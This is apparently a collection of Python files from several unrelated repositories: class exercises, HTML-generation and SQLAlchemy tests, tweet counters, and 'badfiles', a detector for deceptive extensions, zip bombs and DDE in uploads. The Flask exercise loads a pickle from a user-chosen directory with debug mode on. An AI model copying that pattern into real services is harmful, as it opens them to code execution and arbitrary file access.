'sha1': self.sha1})
def scan(self):
"""Scan method for creating pickled FileList hash database, or for
reading the existing FileList file. Located here instead of FileList
class"""
self.pickle_list = []
self.pickled_obj = b''
for d in FileInfo.object_list:
fullfilepath = (d['filename'])
filedir = os.path.dirname(d['filename'])
filename = os.path.basename(d['filename'])
timechanged = (d['timestamp'])
sha1 = (d['sha1'])
timeaccessed = datetime.now().strftime('%Y-%m-%d-%H:%M')
info_dict = {'fullfilepath': fullfilepath, 'filedir': filedir,
'filename': filename, 'timechanged': timechanged,
'sha1': sha1, 'timeaccessed': timeaccessed}
self.pickle_list.append(info_dict)
self.pickled_obj = pickle.dumps(self.pickle_list)
filelist_fullpath = self.target_dir + 'FileList'
if os.path.isfile(filelist_fullpath) == False:
FileInfo.pickle_file_status = '<h3>Pickled file does NOT exist. ' \
'Creating it...</h3>'
with open(filelist_fullpath, 'wb') as fh:
fh.write(self.pickled_obj)
else:
FileInfo.pickle_file_status = '<h3>Pickled file already exists. ' \
'Skipping creation...</h3>'
class FileList(FileInfo):
"""FileList class that subclasses FileInfo to determine if any files were
changed, removed, or added (based on existence or sha1 hash value). Any files
that remain unchanged will not be reported upon."""
def __init__(self, directory):
self.directory = directory
def rescan(self):
filelist_fullpath = self.directory + 'FileList'
try:
with open(filelist_fullpath, 'rb') as fh:
data = fh.read()
unpickled_object = pickle.loads(data)
except:
raise Exception('Pickled file "FileList" does not exist. Exiting...')
pickled_files_list = []
disk_files_list = []
results_dict = {}
changed_list = []
added_list = []
removed_list = []
for d in unpickled_object:
fullfilepath_orig = d['fullfilepath']
pickled_files_list.append(fullfilepath_orig)
for file in os.listdir(self.directory):
fullfilepath_new = os.path.join(self.directory, file)
if os.path.isfile(fullfilepath_new) and \
not fullfilepath_new.endswith('FileList') and \
not fullfilepath_new.endswith('.DS_Store'):
disk_files_list.append(fullfilepath_new)
sha1_new = hashlib.sha1(open(fullfilepath_new, 'rb').read()).hexdigest()
if fullfilepath_orig == fullfilepath_new and \
d['sha1'] == sha1_new:
print(f'exiting file "{fullfilepath_orig}" unchanged')
elif fullfilepath_orig == fullfilepath_new and \
d['sha1'] != sha1_new:
changed_list.append(fullfilepath_orig)
print(f'existing file "{fullfilepath_orig}" CHANGED')
for file in pickled_files_list:
if file not in disk_files_list:
removed_list.append(file)
print(f'previous file "{file}" was REMOVED')
break
for file in disk_files_list:
if file not in pickled_files_list:
added_list.append(file)
print(f'new file "{file}" was ADDED')
break
results_dict = {'added': added_list, 'removed': removed_list, 'changed': changed_list}
return results_dict
@app.route('/')
def home():
"""Web app home page function with usage"""
display_str = '<h2>Home page for the "Tamperserve" web application ' + \
'(solution.py):</h2><h3>UI/Browser Usage:</h3>' + \
'http://127.0.0.1:5000/scan?directory=DIRPATH<br><br>' + \
'  OR<br><br>' + \
'http://127.0.0.1:5000/rescan?directory=DIRPATH<br><br>' + \
'  WHERE<br><br>DIRPATH is diretory path such as: ' + \
'/Users/jeff<br><br><h3>For example:</h3>    ' + \
' http://127.0.0.1:5000/scan?directory=/Users/jeff<br><br>' + \
'<h3>Start application from the CLI as follows:</h3>' + \
'   ./solution.py<br><h3>NOTE:</h3>Make sure you '+ \
'have write access to the directory so the pickled FileList ' + \
'file can be created'
return display_str
@app.route('/scan')
def scan():
"""Scan function that scans the directory provided as an argument and create
the hash database 'FileList' on disk"""
directory = request.args['directory']
directory = check_dir(directory)
results_list = []
if os.path.isdir(directory):
for file in os.listdir(directory):
file_path = os.path.join(directory, file)
if os.path.isfile(file_path) and file != 'FileList' \
and file != '.DS_Store':
results_list.append(file_path)
fi = FileInfo(results_list, directory)
fi.get_file_info()
fi.scan()
result = f'{FileInfo.pickle_file_status} Files are:<br><br>' + \
'<br>'.join(results_list)
else:
result = f'<h2>ERROR</h2><h3>{directory}<br><br> is NOT a directory.' \
'<h3>Please try again with a directory path that exists.</h3>'
return result
@app.route('/rescan')
def rescan():
"""Rescan function that loads pickled hash database from disk, called
FileList"""
result = ''
directory = request.args['directory']
directory = check_dir(directory)
exception = '<h3>Pickled hash database "FileList" AND/OR the directory given ' \
'as an argument do/does not exist.</h3> Run a scan first using the ' \
'"scan" endpoint if the directory is valid, otherwise use a ' \
'valid directory.<br><h3>Directory used was:</h3>'\
f'    {directory}'
if not os.path.isfile(directory + 'FileList'):
return exception
elif os.path.isdir(directory):
fl = FileList(directory)
rescan_output_dict = fl.rescan()
rescan_output = f'<pre>{json.dumps(rescan_output_dict, indent = 4)}</pre>'
print(f'JSON Output is:\n\n {rescan_output}')
result = '<h3>Rescanning the following directory using the pickled ' \
f'"FileList" file on disk:</h3>{directory}<br><br>' + \
'<h3>Changes/Addition/Deletions JSON Output:</h3>' \
f'{rescan_output}'
return result
def main():
"""Main function for web app"""
app.run(debug=True, port=5000)
if __name__ == "__main__":
main()
```
#### File: python_class_2021_B2/exercise_2/solution.py
```python
class Item(object):
def __init__(self, quantity, measure, name, price):
self.quantity = quantity
self.measure = measure
self.name = name
self.price = price
def __iter__(self):
return iter((self.quantity, self.measure, self.name, self.price))
class Cart(object):
def __init__(self):
self.cart_list = []
def add(self, cart_item):
self.cart_list.append(cart_item)
def __format__(self, format):
tmp_str = ''
tmp_list = []
if (format == 'short'):
for value in self.cart_list:
tmp_list.append(value.name)
tmp_str = ', '.join(tmp_list)
elif (format == 'long'):
for value in self.cart_list:
tmp_str += f"{value.quantity:5} {value.measure:10}" \
f"{value.name} @ ${value.price:.2f}..." \
f"${value.quantity*value.price:.2f}\n"
return tmp_str
cart = Cart()
cart.add(Item(1, 'hardcover', 'book', 30))
cart.add(Item(2, 'tube', 'toothpaste', 4))
cart.add(Item(5, 'silver', 'spoon', 5))
cart.add(Item(2.5, 'boxes', 'apples', 5))
print(f"\nYour cart contains: {cart:short}\n")
print(f"Your cart:\n{cart:long}")
```
#### File: python_class_2021_B2/exercise_3/test_solution.py
```python
from solution import count_words_sequential, count_words_threading
def test_non_threaded_empty_dir(tmp_path):
test_directory = tmp_path / 'testfiles'
test_directory.mkdir()
assert 0 == count_words_sequential(str(test_directory / '*.txt'))
def test_non_threaded_dirname(tmp_path):
test_directory = tmp_path / 'testfiles'
test_directory.mkdir()
test_subdir = test_directory / 'subdir'
test_subdir.mkdir()
assert 0 == count_words_sequential(str(test_directory / '*d*'))
def test_non_threaded_one_empty_file(tmp_path):
test_directory = tmp_path / 'testfiles'
test_directory.mkdir()
with open(test_directory / f'mytestfile.txt', 'w') as f:
f.write('')
assert 0 == count_words_sequential(str(test_directory / '*.txt'))
def test_non_threaded_five(tmp_path):
test_directory = tmp_path / 'testfiles'
test_directory.mkdir()
s = 'abc def ghi jkl mno'
for filename in ['abc', 'def', 'ghi']:
with open(test_directory / f'{filename}.txt', 'w') as f:
f.write(s)
assert 15 == count_words_sequential(str(test_directory / '*.txt'))
def test_threaded_empty_dir(tmp_path):
test_directory = tmp_path / 'testfiles'
test_directory.mkdir()
assert 0 == count_words_threading(str(test_directory / '*.txt'))
def test_threaded_dirname(tmp_path):
test_directory = tmp_path / 'testfiles'
test_directory.mkdir()
test_subdir = test_directory / 'subdir'
test_subdir.mkdir()
assert 0 == count_words_threading(str(test_directory / '*d*'))
def test_threaded_one_empty_file(tmp_path):
test_directory = tmp_path / 'testfiles'
test_directory.mkdir()
with open(test_directory / f'mytestfile.txt', 'w') as f:
f.write('')
assert 0 == count_words_threading(str(test_directory / '*.txt'))
def test_threaded_five(tmp_path):
test_directory = tmp_path / 'testfiles'
test_directory.mkdir()
s = 'abc def ghi jkl mno'
for filename in ['abc', 'def', 'ghi']:
with open(test_directory / f'{filename}.txt', 'w') as f:
f.write(s)
assert 15 == count_words_threading(str(test_directory / '*.txt'))
```
#### File: python_class_2021_B2/exercise_5/solution.py
```python
import argparse
import textwrap
def main():
"""Main function for headtail program"""
###Configure command line options using argparse
parser = argparse.ArgumentParser(formatter_class=\
argparse.RawTextHelpFormatter)
parser.add_argument('--start', '-s', nargs='?', const=1, type=int, default=3)
parser.add_argument('--end', '-e', nargs='?', const=1, type=int, default=3)
parser.add_argument('filename', nargs='+', help=textwrap.dedent('''
NOTES:
- Enter the positional required argument "filename". You can enter the name
of an existing file in the current directory, or "tmpfile" which is
auto-generated with a default of 100 lines.
- Enter the optional argument for the number of lines to print from the
beginning (head) of the file (-s <int> or --start <int>).
- Enter the optional argument for the number of lines to print from the
end (tail) of the file (-e <int> or --end <int>).
- For example: ./solution.py tmpfile -s 2 -e 2
OR
./solution.py tmpfile
- If no value is given for --start and/or --end, a default of 3 will be used.
- Use -h or --help for help info as noted above.'''))
args = parser.parse_args()
### Create a file to parse head and tail lines from
num_lines = 100
cntr = 1
print(f'\nCreating a file with {num_lines} lines called "tmpfile" in the '
'local directory...')
with open('./tmpfile', 'w+') as fh:
while cntr <= num_lines:
if cntr == 100:
fh.write(f'line_{cntr}')
else:
fh.write(f'line_{cntr}\n')
cntr += 1
### Determine lines in existing local file supplied as an arg instead of
### the auto-generated "tmpfile"
if args.filename[0] != 'tmpfile':
with open(args.filename[0], 'r') as fh:
file_list = fh.readlines()
num_lines = len(file_list)
### Determine number of lines requested from start and end arguments and
### print them from the # if there are enough lines. Otherwise,
### error out.
if args.start + args.end <= num_lines:
print(f'\nPrinting {args.start} line(s) from head and {args.end} line(s)'
f' from tail of the "{args.filename[0]}" file.\nUsing the -s and '
'-e arguments value, or the default value "3" if either was not '
'given...\n')
with open(args.filename[0], 'r') as fh:
file_list = fh.readlines()
for index,value in enumerate(file_list):
value = value.replace('\n', '')
file_list[index] = value
head_list = file_list[:args.start]
tail_list = file_list[-args.end:]
for value in head_list:
print(value)
print('...')
for value in tail_list:
print(value)
print('\n')
else:
raise ValueError(f'\n\nCannot print {args.start + args.end} lines from a file with {num_lines} lines.\n\nExiting!!\n')
if __name__ == '__main__':
main()
```
#### File: python_class_2021_B2/exercise_8/solution.py
```python
import unicodedata
def str_range(start, end, *args):
"""Function to mimic range function in standar python library. Both start
and end values are mandatory, step value as the third arg is optional. The
step value must be an int (positive or negative) and not 0 or 1, otherwise
a TypeError excpetion is raised."""
step_val = 1
if len(args) == 1 and isinstance(args[0], int) \
and (args[0] != 0 and args[0] != 1):
step_val = args[0]
elif len(args) == 0:
pass
else:
raise TypeError('No more than 3 args can be suplied to str_range, and 3rd arg must a non-zero "int" and not "1"')
# Get the normalized int value for the character from the unicodedata module
start_num = [ord(c) for c in unicodedata.normalize('NFC', start)]
end_num = [ord(c) for c in unicodedata.normalize('NFC', end)]
# Determine the number of chars betwen the start and end args (including the
# start and end chars) and the step_val arg (if supplied)
if step_val % 2 == 0:
length = abs(int((abs(start_num[0] - end_num[0]) + 2) / step_val))
else:
length = abs(int((abs(start_num[0] - end_num[0]) + 1) / step_val))
if step_val > length:
raise TypeError('Step value cannot be greater than the cardinality of the chars between start char and end char')
counter = 0
char_str = ''
while counter < length:
char_str += chr(start_num[0] + step_val * counter)
counter += 1
print(char_str)
return(iter(char_str))
## prints: a
str_range('a', 'a')
## prints: ace
str_range('a', 'f', 2)
## prints: ac
str_range('a', 'c', 2)
## prints: ca
str_range('c', 'a', -2)
## prints: TypeError: Step value cannot be greater than the cardinality of the
## chars between start char and end char
#str_range('c', 'a', 3) #Commenting out for pytest. Uncomment to test standalone
```
#### File: python_class_2021_B2/exercise_8/test_solution.py
```python
from solution import str_range
def test_same_start_end():
r = str_range('a', 'a')
assert iter(r) == r
assert ''.join(list(r)) == 'a'
def test_simple():
r = str_range('a', 'c')
assert ''.join(list(r)) == 'abc'
def test_simple_with_step():
r = str_range('a', 'c', 2)
assert ''.join(list(r)) == 'ac'
def test_simple_with_negativestep():
r = str_range('c', 'a', -2)
assert ''.join(list(r)) == 'ca'
def test_hebrew():
r = str_range('א', 'ז', 2)
assert ''.join(list(r)) == 'אגהז'
```
|
{
"source": "jeffa/HTML-Auto-python",
"score": 3
}
|
#### File: HTML-Auto-python/t/02-tags.py
```python
import unittest
from HTML.Auto import Tag
from HTML.Auto import Attr
class TestTags(unittest.TestCase):
def test_init(self):
auto = Tag()
self.assertEqual( auto.encode, 0, "no args encode correct" )
self.assertEqual( auto.encodes, '', "no args encodes correct" )
self.assertEqual( auto.indent, '', "no args indent correct" )
self.assertEqual( auto.level, 0, "no args level correct" )
self.assertEqual( auto.sort, 0, "no args sort correct" )
self.assertEqual( auto.newline, '', "no args newline correct" )
auto = Tag({ 'encodes': '<>', 'indent': ' ', 'sort': 1, 'level': 2 })
#self.assertEqual( auto.encode, 1, "encode set correct" )
self.assertEqual( auto.encodes, '<>', "encodes set correct" )
self.assertEqual( auto.indent, ' ', "indent set correct" )
self.assertEqual( auto.level, 2, "sort set correct" )
self.assertEqual( auto.sort, 1, "sort set correct" )
self.assertEqual( auto.newline, "\n", "newline set correct" )
def test_empty(self):
auto = Tag()
self.assertEqual( auto.tag( { 'tag': 'html' } ), '<html />', "no cdata correct" )
self.assertEqual( auto.tag( { 'tag': 'html', 'cdata': '' } ), '<html />', "empty cdata correct" )
def test_empty_attr(self):
auto = Tag()
self.assertEqual( auto.tag( { 'tag': 'foo', 'attr': { 'bar': 'qux' } } ), '<foo bar="qux" />', "no cdata with attr correct" )
self.assertEqual( auto.tag( { 'tag': 'foo', 'cdata': '', 'attr': { 'bar': 'qux' } } ), '<foo bar="qux" />', "empty cdata with attr correct" )
def test_nonempty(self):
auto = Tag()
self.assertEqual( auto.tag( { 'tag': 'p', 'cdata': 0 } ), '<p>0</p>', "0 (int) as cdata" )
self.assertEqual( auto.tag( { 'tag': 'p', 'cdata': '0' } ), '<p>0</p>', "0 (str) as cdata" )
self.assertEqual( auto.tag( { 'tag': 'html', 'cdata': ' ' } ), '<html> </html>', "whitespace cdata correct" )
self.assertEqual( auto.tag({ 'tag': 'ol', 'cdata': { 'tag': 'li', 'cdata': '1' } }), '<ol><li>1</li></ol>', "ol tag correct" )
self.assertEqual( auto.tag({ 'tag': 'ol', 'cdata': [{ 'tag': 'li', 'cdata': 1 }, { 'tag': 'li', 'cdata': 2 }] }), '<ol><li>1</li><li>2</li></ol>', "ol tag correct" )
def test_nonempty_attr(self):
auto = Tag()
self.assertEqual( auto.tag({ 'tag': 'ol', 'cdata': { 'tag': 'li', 'cdata': '1' }, 'attr': { 'class': 'ordered' } }), '<ol class="ordered"><li>1</li></ol>', "ol tag correct" )
attr = { 'class': [ 'odd', 'even' ] }
self.assertEqual( auto.tag({ 'tag': 'ol', 'cdata': [{ 'tag': 'li', 'cdata': 1, 'attr': attr }, { 'tag': 'li', 'cdata': 2, 'attr': attr }] }), '<ol><li class="odd">1</li><li class="even">2</li></ol>', "ol tag correct" )
def test_indent(self):
auto = Tag({ 'indent': ' ' })
self.assertEqual( auto.tag({ 'tag': 'p', 'cdata': 0 }), "<p>0</p>\n", "paragraph tag correct" )
self.assertEqual( auto.tag({ 'tag': 'ol', 'cdata': { 'tag': 'li', 'cdata': 1 } }), "<ol>\n <li>1</li>\n</ol>\n", "ol tag correct" )
self.assertEqual( auto.tag({ 'tag': 'ol', 'cdata': [{ 'tag': 'li', 'cdata': 1 }, { 'tag': 'li', 'cdata': 2 }] }), "<ol>\n <li>1</li>\n <li>2</li>\n</ol>\n", "ol tag correct" )
def test_level(self):
auto = Tag({ 'indent': ' ', 'level': 3 })
self.assertEqual( auto.tag({ 'tag': 'p', 'cdata': 0 }), " <p>0</p>\n", "paragraph tag correct" )
self.assertEqual( auto.tag({ 'tag': 'ol', 'cdata': { 'tag': 'li', 'cdata': 1 } }), " <ol>\n <li>1</li>\n </ol>\n", "ol tag correct" )
self.assertEqual( auto.tag({ 'tag': 'ol', 'cdata': [{ 'tag': 'li', 'cdata': 1 }, { 'tag': 'li', 'cdata': 2 }] }), " <ol>\n <li>1</li>\n <li>2</li>\n </ol>\n", "ol tag correct" )
if __name__ == '__main__':
unittest.main()
```
#### File: HTML-Auto-python/t/04-tag-attrs.py
```python
import unittest
from HTML.Auto import Tag
class TestTagAttrs(unittest.TestCase):
def test_simple(self):
auto = Tag()
self.assertEqual(
'<p class="paragraph" />',
auto.tag( { 'tag': 'p', 'attr': { 'class': 'paragraph' } } ),
'empty paragraph tag correct'
)
self.assertEqual(
'<p class="paragraph">0</p>',
auto.tag( { 'tag': 'p', 'attr': { 'class': 'paragraph' }, 'cdata': 0 } ),
'paragraph tag correct'
)
self.assertEqual(
'<colgroup span="0">0</colgroup>',
auto.tag( { 'tag': 'colgroup', 'attr': { 'span': 0 }, 'cdata': 0 } ),
'colgroup tag correct'
)
self.assertEqual(
'<colgroup span="3"><col /></colgroup>',
auto.tag( {'attr': {'span': 3}, 'cdata': [{'attr': {}, 'tag': 'col'}], 'tag': 'colgroup'} ),
'colgroup tag correct'
)
self.assertEqual(
'<colgroup span="3"><col /><col /></colgroup>',
auto.tag( {'attr': {'span': 3}, 'cdata': [{'attr': {}, 'tag': 'col'},{'attr': {}, 'tag': 'col'}], 'tag': 'colgroup'} ),
'colgroup tag correct'
)
self.assertEqual(
'<table><colgroup><col /><col /><col /></colgroup><colgroup><col /><col /><col /></colgroup><colgroup><col /><col /><col /></colgroup></table>',
auto.tag({ 'tag': 'table', 'cdata': [
{'tag': 'colgroup', 'attr': {}, 'cdata': [{'tag': 'col', 'attr': {}}, {'tag': 'col', 'attr': {}}, {'tag': 'col', 'attr': {}}] },
{'tag': 'colgroup', 'attr': {}, 'cdata': [{'tag': 'col', 'attr': {}}, {'tag': 'col', 'attr': {}}, {'tag': 'col', 'attr': {}}] },
{'tag': 'colgroup', 'attr': {}, 'cdata': [{'tag': 'col', 'attr': {}}, {'tag': 'col', 'attr': {}}, {'tag': 'col', 'attr': {}}] } ] }),
'colgroup tag correct'
)
self.assertEqual(
'<table><colgroup><col /><col /><col /></colgroup><colgroup><col /><col /><col /></colgroup><colgroup><col /><col /><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>',
auto.tag({ 'tag': 'table', 'cdata': [
{'tag': 'colgroup', 'attr': {}, 'cdata': [{'tag': 'col', 'attr': {}}, {'tag': 'col', 'attr': {}}, {'tag': 'col', 'attr': {}}]},
{'tag': 'colgroup', 'attr': {}, 'cdata': [{'tag': 'col', 'attr': {}}, {'tag': 'col', 'attr': {}}, {'tag': 'col', 'attr': {}}]},
{'tag': 'colgroup', 'attr': {}, 'cdata': [{'tag': 'col', 'attr': {}}, {'tag': 'col', 'attr': {}}, {'tag': 'col', 'attr': {}}]},
{'tag': 'tr', 'attr': {}, 'cdata': [{'tag': 'th', 'attr': {}, 'cdata': 'a'}, {'tag': 'th', 'attr': {}, 'cdata': 'b'}, {'tag': 'th', 'attr': {}, 'cdata': 'c'}]},
{'tag': 'tr', 'attr': {}, 'cdata': [{'tag': 'td', 'attr': {}, 'cdata': '1'}, {'tag': 'td', 'attr': {}, 'cdata': '2'}, {'tag': 'td', 'attr': {}, 'cdata': '3'}]},
{'tag': 'tr', 'attr': {}, 'cdata': [{'tag': 'td', 'attr': {}, 'cdata': '4'}, {'tag': 'td', 'attr': {}, 'cdata': '5'}, {'tag': 'td', 'attr': {}, 'cdata': '6'}]}
] }),
'colgroup tag correct'
)
if __name__ == '__main__':
unittest.main()
```
|
{
"source": "jeffakolb/Gnip-Analysis-Pipeline",
"score": 3
}
|
#### File: Gnip-Analysis-Pipeline/example/my_measurements.py
```python
class TweetCounter(object):
def __init__(self, **kwargs):
self.counter = 0
def add_tweet(self,tweet):
self.counter += 1
def get(self):
return [(self.counter,self.get_name())]
def get_name(self):
return 'TweetCounter'
def combine(self,new):
self.counter += new.counter
class ReTweetCounter(object):
def __init__(self, **kwargs):
self.counter = 0
def add_tweet(self,tweet):
if tweet['verb'] == 'share':
self.counter += 1
def get(self):
return [(self.counter,self.get_name())]
def get_name(self):
return 'ReTweetCounter'
def combine(self,new):
self.counter += new.counter
measurement_class_list = [TweetCounter, ReTweetCounter]
```
|
{
"source": "jeffakolb/Gnip-Filter-Optimization",
"score": 2
}
|
#### File: jeffakolb/Gnip-Filter-Optimization/metrics_lib.py
```python
import numpy
def precision(labeled_tweets):
return numpy.mean([tweet['LBLR_label'] for tweet in labeled_tweets])
setattr(precision,'metric_name','precision')
```
|
{
"source": "jeffalbion/sqlalchemy-sqlany",
"score": 2
}
|
#### File: sqlalchemy-sqlany/test/requirements.py
```python
from sqlalchemy.testing.requirements import SuiteRequirements
from sqlalchemy.testing import exclusions
class Requirements(SuiteRequirements):
@property
def intersect(self):
return exclusions.open()
@property
def except_(self):
return exclusions.open()
@property
def window_functions(self):
return exclusions.open()
@property
def views(self):
return exclusions.open()
@property
def reflects_pk_names(self):
return exclusions.open()
@property
def datetime(self):
"""target dialect supports representation of Python
datetime.datetime() objects."""
return exclusions.closed()
@property
def datetime_microseconds(self):
"""target dialect supports representation of Python
datetime.datetime() with microsecond objects."""
return exclusions.closed()
@property
def datetime_historic(self):
"""target dialect supports representation of Python
datetime.datetime() objects with historic (pre 1900) values."""
return exclusions.closed()
@property
def date(self):
"""target dialect supports representation of Python
datetime.date() objects."""
return exclusions.closed()
@property
def date_historic(self):
"""target dialect supports representation of Python
datetime.datetime() objects with historic (pre 1900) values."""
return exclusions.closed()
@property
def time(self):
"""target dialect supports representation of Python
datetime.time() objects."""
return exclusions.closed()
@property
def time_microseconds(self):
"""target dialect supports representation of Python
datetime.time() with microsecond objects."""
return exclusions.closed()
@property
def order_by_col_from_union(self):
"""target database supports ordering by a column from a SELECT
inside of a UNION
E.g. (SELECT id, ...) UNION (SELECT id, ...) ORDER BY id
"""
return exclusions.closed()
@property
def cross_schema_fk_reflection(self):
"""target system must support reflection of inter-schema foreign keys
"""
return exclusions.closed()
@property
def independent_connections(self):
"""target system must support simultaneous, independent database connections.
"""
return exclusions.open()
@property
def temp_table_reflection(self):
return exclusions.closed()
@property
def implicitly_named_constraints(self):
return exclusions.open()
@property
def unique_constraint_reflection(self):
return exclusions.closed()
@property
def floats_to_four_decimals(self):
return exclusions.closed()
@property
def precision_generic_float_type(self):
return exclusions.closed()
```
#### File: sqlalchemy-sqlany/test/test_suite.py
```python
from sqlalchemy.testing.suite import *
from sqlalchemy.testing.suite import ComponentReflectionTest as _ComponentReflectionTest
from sqlalchemy.testing.suite import InsertBehaviorTest as _InsertBehaviorTest
from sqlalchemy.testing.suite import LimitOffsetTest as _LimitOffsetTest
from sqlalchemy.testing.suite import RowFetchTest as _RowFetchTest
from sqlalchemy.testing.suite import TextTest as _TextTest
from sqlalchemy.testing.suite import UnicodeTextTest as _UnicodeTextTest
from sqlalchemy.testing.suite import StringTest as _StringTest
from sqlalchemy.testing.suite import UnicodeVarcharTest as _UnicodeVarcharTest
class ComponentReflectionTest(_ComponentReflectionTest):
""" Temporary tables need to use 'GLOBAL TEMPORARY' or 'LOCAL TEMPORARY'
in SQL Anywhere
"""
@classmethod
def define_temp_tables(cls, metadata):
kw = {
'prefixes': ["GLOBAL TEMPORARY"],
}
user_tmp = Table(
"user_tmp", metadata,
Column("id", sa.INT, primary_key=True),
Column('name', sa.VARCHAR(50)),
Column('foo', sa.INT),
sa.UniqueConstraint('name', name='user_tmp_uq'),
sa.Index("user_tmp_ix", "foo"),
**kw
)
if testing.requires.view_reflection.enabled and \
testing.requires.temporary_views.enabled:
event.listen(
user_tmp, "after_create",
DDL("create temporary view user_tmp_v as "
"select * from user_tmp")
)
event.listen(
user_tmp, "before_drop",
DDL("drop view user_tmp_v")
)
class InsertBehaviorTest(_InsertBehaviorTest):
def test_insert_from_select_with_defaults( self ):
pass
class LimitOffsetTest(_LimitOffsetTest):
def test_bound_limit( self ):
pass
def test_bound_limit_offset( self ):
pass
def test_bound_offset( self ):
pass
class RowFetchTest(_RowFetchTest):
def test_row_w_scalar_select(self):
pass
class TextTest(_UnicodeTextTest):
def test_literal_backslashes(self):
pass
def test_literal(self):
pass
def test_round_trip(self):
pass
def test_round_trip_executemany(self):
pass
class UnicodeTextTest(_UnicodeTextTest):
def test_literal_backslashes(self):
pass
def test_literal(self):
pass
def test_round_trip(self):
pass
def test_round_trip_executemany(self):
pass
class StringTest(_StringTest):
def test_literal_backslashes(self):
pass
class UnicodeVarcharTest(_UnicodeVarcharTest):
def test_literal_backslashes(self):
pass
def test_literal(self):
pass
def test_round_trip(self):
pass
def test_round_trip_executemany(self):
pass
```
|
{
"source": "Jeffallan/badfiles",
"score": 2
}
|
#### File: badfiles/badfiles/badfiles.py
```python
import enum
import mimetypes
import os
import pathlib
import warnings
from collections import namedtuple
from dataclasses import dataclass
from enum import Enum
from os import PathLike
from typing import IO, Dict, ItemsView, List, Optional, Tuple
from zipfile import BadZipFile, LargeZipFile, Path, ZipFile
import magic
import yara # type: ignore
from badfiles.utils import DDE_CHECKS, RULE_DIR, find_dde, process_tar, unzip_doc # type: ignore
class Classification(Enum):
"""The results returned by the BadFile class
Attributes:
SAFE (str): Nothing malicious was detected.
UNSAFE (str): Malicious content was detected.
NOT_IMPLEMENTED (str): The file type has not been implemented in the detection engine.
UNKNOWN (str): The file type cannot be determined.
"""
SAFE = "safe"
UNSAFE = "unsafe"
NOT_IMPLEMENTED = "not implemented"
UNKNOWN = "unknown"
SAFE_MSG = "Nothing malicious was detected"
BadfileMsg = namedtuple("BadfileMsg", ["classification", "message", "file"])
@dataclass
class Badfile(object):
"""The class that implements the badfiles detection engine.
Attributes:
zip_rules (Optional[str]): The path to yara detection rules for zip files (defaults to ./rules/zip_rules.yara)
tar_rules (Optional[str]): The path to yara detection rules for tar files (defaults to ./rules/tar_rules.yara)
csv_rules (Optional[str]): The path to yara detection rules for tar files (defaults to ./rules/csv_rules.yara)
"""
zip_rules: Optional[str] = str(pathlib.Path(RULE_DIR) / "rules/zip_rules.yara")
tar_rules: Optional[str] = str(pathlib.Path(RULE_DIR) / "rules/tar_rules.yara")
csv_rules: Optional[str] = str(pathlib.Path(RULE_DIR) / "rules/csv_rules.yara")
# gzip_rules: Optional[str] = None
# image_rules: Optional[str] = None
def __post_init__(self) -> None:
self.rules = dict()
for k, v in self.__dataclass_fields__.items(): # type: ignore
self.rules[k] = yara.compile(v.default) if v.default is not None else None
def _rule_factory(self, f: PathLike, mime: str) -> BadfileMsg:
m = f"{mime.split('/')[1].replace('x-', '')}_rules"
if m in self.rules.keys():
if self.rules[m] is None:
# warnings.warn("This mime type has not been implented.")
return BadfileMsg(
Classification.NOT_IMPLEMENTED.value,
"This mime type has not been implented.",
f,
)
return self._rule_match(self.rules[m], f, mime)
else:
# check for DDE
if mime in DDE_CHECKS:
match = self._rule_match(self.rules["zip_rules"], f, mime="application/zip")
if match.classification == "safe":
if find_dde(unzip_doc(f)):
return BadfileMsg(
Classification.UNSAFE.value,
"DDE detected",
pathlib.Path(f).name,
)
return match
return BadfileMsg(
Classification.UNKNOWN.value, f"Unrecognized mime type {mime}", pathlib.Path(f).name
)
def _rule_match(self, rules: yara.Rules, f: PathLike, mime: str):
hits: List = []
def cb(data):
# print(data, msg)
msg = BadfileMsg(
Classification.UNSAFE.value, data["meta"]["description"], pathlib.Path(f).name
)
yara.CALLBACK_ABORT
hits.append(msg)
if mime == "application/x-tar":
for t in process_tar(f):
rules.match(data=t, callback=cb, which_callbacks=yara.CALLBACK_MATCHES)
else:
rules.match(str(f), callback=cb, which_callbacks=yara.CALLBACK_MATCHES)
if len(hits) > 0:
return hits[0]
return BadfileMsg(Classification.SAFE.value, SAFE_MSG, pathlib.Path(f).name)
def _mime_type_confusion(self, f: PathLike) -> Tuple[bool, str, str]:
try:
confusion = (
mimetypes.guess_type(f, strict=True)[0].split("/")[1] # type: ignore
== magic.from_file(str(f), mime=True).split("/")[1],
magic.from_file(str(f), mime=True),
mimetypes.guess_type(f, strict=True)[0],
)
except AttributeError:
confusion = (False, "", "")
return confusion
def is_badfile(self, f: PathLike) -> BadfileMsg:
"""This function checks for various indicators of potentially malicious content including:
- Mime Type confusion;
- Zip files with high compression rates and;
- Hands f to the proper yara detection rules.
Args:
f (PathLike): The path of the file to be analyzed
Returns:
BadfileMsg: The BadfileMsg named tuple
"""
is_mime_confusion = self._mime_type_confusion(f)
if is_mime_confusion[0] is False:
return BadfileMsg(
Classification.UNSAFE.value,
f"Deceptive extension. File extension suggests {is_mime_confusion[2]} inspection shows {is_mime_confusion[1]}",
pathlib.Path(f).name,
)
if is_mime_confusion[1] == "application/zip":
if self._high_compression(f):
return BadfileMsg(
Classification.UNSAFE.value, "high compression rate", pathlib.Path(f).name
)
return self._rule_factory(f, is_mime_confusion[1])
def _high_compression(self, f: PathLike, rate: float = 0.75) -> bool:
try:
zip_file = ZipFile(f)
except BadZipFile:
return False
stats = []
for z in zip_file.infolist():
try:
stats.append(1 - (z.compress_size / z.file_size))
except ZeroDivisionError:
return False
except LargeZipFile:
return True # TODO move LargeZipFile check to another function?
if len(stats) == 0:
return False
return sum(stats) / len(stats) > rate
def isolate_or_clear(
f: PathLike,
msg: BadfileMsg,
iso_dir: Optional[str] = None,
safe_dir: Optional[str] = None,
safe: List = ["safe"],
) -> None:
def _move_file(f: PathLike, msg: BadfileMsg, safe: List = safe) -> None:
if msg.classification in safe:
pathlib.Path(f).rename(pathlib.Path(safe_dir).resolve() / pathlib.Path(f).name)
else:
pathlib.Path(f).rename(pathlib.Path(iso_dir).resolve() / pathlib.Path(f).name)
try:
pathlib.Path(iso_dir).resolve().mkdir(parents=True)
pathlib.Path(safe_dir).resolve().mkdir(parents=True)
_move_file(f, msg)
except FileExistsError:
pathlib.Path(iso_dir).resolve()
pathlib.Path(safe_dir).resolve()
_move_file(f, msg)
except TypeError:
pass
```
#### File: badfiles/badfiles/cli.py
```python
import pathlib
# import fire # type: ignore
from gooey import Gooey, GooeyParser # type: ignore
